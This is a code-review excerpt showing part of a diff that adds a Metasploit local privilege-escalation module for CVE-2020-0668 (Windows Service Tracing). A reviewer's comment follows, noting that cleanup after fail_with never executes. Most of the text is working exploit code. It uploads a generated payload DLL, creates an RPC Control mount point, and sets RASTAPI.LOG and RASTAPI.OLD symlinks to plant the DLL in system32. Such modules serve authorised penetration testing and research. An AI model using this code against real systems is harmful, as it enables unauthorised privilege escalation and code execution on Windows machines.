modules/exploits/windows/local/cve_2020_0668_service_tracing.rb

```diff
@@ -0,0 +1,388 @@
+      print_error("Caught timeout.  Exploit may be taking longer or it may have failed.")
+    end
+    vprint_status("Cleaning up #{upload_filename}")
+    ensure_clean_destination(upload_filename)
+
+  end
+  def exploit
+    # Make directories
+    if datastore['EXPLOIT_DIR'].nil?
+      @exploit_dir = session.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha((rand(8) + 6))
+    else
+      @exploit_dir = datastore['EXPLOIT_DIR']
+    end
+    vprint_status("Making #{@exploit_dir} on #{sysinfo['Computer']}")
+    make_dir(@exploit_dir)
+    @mount_dir = '\\RPC Control\\'
+    vprint_status("Making #{@mount_dir} on #{sysinfo['Computer']}")
+
+    # get variables in order
+#    make_dir(@mount_dir)
+    payload_name = datastore['PAYLOAD_UPLOAD_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.dll'
+    upload_payload_pathname = "#{@exploit_dir}\\#{payload_name}"
+    win_dir = session.sys.config.getenv('windir')
+    target_payload_pathname = "#{win_dir}\\system32\\WindowsCoreDeviceInfo.dll"
+#    target_payload_pathname = "#{win_dir}\\system32\\WindowsCoreDeviceInfo.dll"
+    new_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.log'
+    old_logfile_name = datastore['LOG_FILENAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) + '.log'
+    payload_dll = generate_payload_dll
+    print_status("Payload DLL is #{payload_dll.length} bytes long")
+    reg_hash = create_reg_hash(payload_dll.length-1)
+    vprint_status("Registry hash = #{reg_hash}")
+
+    # Create mountpoint
+    vprint_status("Creating mountpoint")
+    unless create_mount_point(@exploit_dir, @mount_dir)
+      fail_with(Failure::Unknown, "Error when creating the mount point... aborting.")
+      cleanup_everything
+    end
+
+    # Upload payload
+    upload_payload_pathname = session.sys.config.getenv('TEMP') + "\\" + Rex::Text.rand_text_alpha((rand(8) + 6)) + ".dll"
+    vprint_status("Uploading payload to #{upload_payload_pathname}")
+    write_file(upload_payload_pathname, payload_dll)
+    upload_md5 = session.fs.file.md5(upload_payload_pathname)
+    vprint_status("Payload md5 = #{Rex::Text.to_hex(upload_md5,'')}")
+
+
+    # Create Symlinks
+    vprint_status("Creating Symlinks")
+    print_status("Creating symlink #{upload_payload_pathname} in \\RPC Control\\RASTAPI.LOG")
+    symlink_handle = create_symlink(nil, "\\RPC Control\\RASTAPI.LOG", "\\??\\#{upload_payload_pathname}")
+    unless symlink_handle
+      fail_with(Failure::Unknown, "Error when creating the RASTAPI.LOG symlink... aborting.")
+      cleanup_everything
+    end
+    @handles << symlink_handle
+    print_status("Creating symlink #{target_payload_pathname} in \\RPC Control\\RASTAPI.OLD")
+    symlink_handle = create_symlink(nil, "\\RPC Control\\RASTAPI.OLD", "\\??\\#{target_payload_pathname}")
+    unless symlink_handle
+      fail_with(Failure::Unknown, "Error when creating the RASTAPI.OLD symlink... aborting.")
+      cleanup_everything
```

Comment:
I don't think this will ever get executed due to the preceding `fail_with`, as `fail_with` raises `Msf::Exploit::Failed`.